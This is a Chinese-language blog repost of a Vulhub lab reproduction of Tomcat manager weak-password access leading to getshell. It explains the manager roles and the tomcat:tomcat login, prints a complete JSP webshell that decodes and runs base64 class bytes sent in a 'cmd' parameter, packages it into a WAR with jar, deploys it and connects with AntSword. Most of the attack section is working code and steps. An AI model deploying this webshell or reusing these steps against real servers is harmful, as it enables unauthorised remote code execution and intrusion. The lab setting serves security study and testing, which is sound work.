【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞

这篇具有很好参考价值的文章主要介绍了【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

说明 内容
漏洞编号
漏洞名称 Tomcat7+ 弱口令 && 后台getshell漏洞
漏洞评级 高危
影响范围 Tomcat 版本:8.0
漏洞描述 Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限
tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击
修复方案

1.1、漏洞描述

Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限

Tomcat7+权限分为:

  • manager(后台管理)
    • manager-gui 拥有html页面权限
    • manager-status 拥有查看status的权限
    • manager-script 拥有text接口的权限,和status权限
    • manager-jmx 拥有jmx权限,和status权限
  • host-manager(虚拟主机管理)
    • admin-gui 拥有html页面权限
    • admin-script 拥有text接口权限

这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html

conf/tomcat-users.xml文件中配置用户的权限:

<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

    <role rolename="manager-gui"/>
    <role rolename="manager-script"/>
    <role rolename="manager-jmx"/>
    <role rolename="manager-status"/>
    <role rolename="admin-gui"/>
    <role rolename="admin-script"/>
    <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
    
</tomcat-users>

可见,用户tomcat拥有上述所有权限,密码是tomcat

正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。

1.2、漏洞等级

高危

1.3、影响版本

Tomcat 版本:8.0

1.4、漏洞复现

1、基础环境

Path:Vulhub/tomcat/tomcat8


启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8080/即可看到

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

点击Manager App即可跳到管理登陆页面

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

输入用户名密码 tomcat:tomcat,来到管理界面

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

2、漏洞扫描
3、漏洞验证

登录到后台后可以通过部署war包进行getshell

找一个a.jsp木马

<%!
      class U extends ClassLoader {
		  U(ClassLoader c){
			  super(c);
		  }
		  public Class g(byte[] b){
			  return super.defineClass(b,0,b.length);
		  }
	  }
	 public byte[] base64Decode(String str) throws Exception{
		 try{
			 Class clazz =Class.forName("sun.misc.BASE64Decoder");
			 return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
		 }catch (Exception e){
			 Class clazz =Class.forName("java.util.Base64");
			 Object decoder =clazz.getMethod("getDecoder").invoke(null);
			 return(byte[])decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
		 }
	 }
%>
<% 
       String cls =request.getParameter("cmd");
       if(cls != null){
         new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);	 
 }
%>

打包成war

jar cvf tomcat.war a.jsp

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

上传打包的tomcat.war

生成一个tomcat的路径

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现

蚁剑连接,密码cmd

【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞,# 漏洞复现,apache,漏洞复现文章来源地址https://www.toymoban.com/news/detail-743282.html

到了这里,关于【漏洞复现】Apache_Tomcat7+ 弱口令 && 后台getshell漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 漏洞复现Tomcat系列弱口令、CVE-2017-12615、CVE-2020-1938

    Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。如果可以利用弱口令进去的,可直接getshell vulhub搭建环境 访问靶场地址,使用tomcat/tomcat弱口令登录后台 制作webshell.war 上传shell.war,访问试一下并用冰蝎连接试一下 成功拿到shell权限 Apache Tomcat 7.0.0版本至7.0.

    2024年02月12日
    浏览(38)
  • Apache Tomcat 漏洞复现

    链接地址:Vulhub - Docker-Compose file for vulnerability environment 1.1 漏洞描述 说明 内容 漏洞编号 漏洞名称 Tomcat7+ Weak Password Backend Getshell Vulnerability 漏洞评级 高危 影响范围 8.0 漏洞描述 Tomcat 支持通过后端部署 war 文件,所以我们可以直接将 webshell 放入 Web 目录下。为了访问后端,需

    2024年02月09日
    浏览(47)
  • Apache Tomcat漏洞复现

    来到vulhub/tomcat/tomcat8/靶场 安装环境并启动: 修改端口后启动: 打开环境:

    2024年02月09日
    浏览(37)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(48)
  • 中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-IIS-短文件解析蓝屏等 2、中间件-Nginx-文件解析命令执行等 3、中间件-Apache-RCE目录遍历文件解析等 4、中间件

    2024年02月07日
    浏览(50)
  • 服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    目录 一、导图 二、ISS漏洞 中间件介绍 1、短文件 2、文件解析 3、HTTP.SYS 4、cve-2017-7269 三、Nignx漏洞 中间件介绍 1、后缀解析漏洞 2、cve-2013-4547 3、cve-2021-23017 无 EXP 4、cve-2017-7529 意义不大 四、Apache漏洞 中间件介绍 1、漏洞版本简介 2、cve-2021-42013 3、cve-2021-41773 4、cve-2017-1571

    2024年02月10日
    浏览(63)
  • 【漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件 漏洞评级 高危 影响范围 Tomcat版本:8.5.19 漏洞描述 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 修复方案

    2024年02月05日
    浏览(37)
  • Hadoop未授权访问 getshell——漏洞复现

     Hadoop未授权访问漏洞介绍 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害

    2024年04月16日
    浏览(53)
  • 【漏洞复现】Sentinel Dashboard默认弱口令漏洞

            Sentinel Dashboard是一个轻量级的开源控制台,提供机器发现以及健康情况管理、监控、规则管理和推送的功能。它还提供了详细的被保护资源的实际访问统计情况,以及为不同服务配置的限流规则。         Sentinel Dashboard存在默认弱口令sentinel/sentinel,攻击者可

    2024年01月16日
    浏览(59)
  • NPS(cnlh)内网穿透弱口令与登录爆破漏洞复现-内附自动化脚本

    目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 复现 4.2 POCsuite POC

    2024年02月10日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包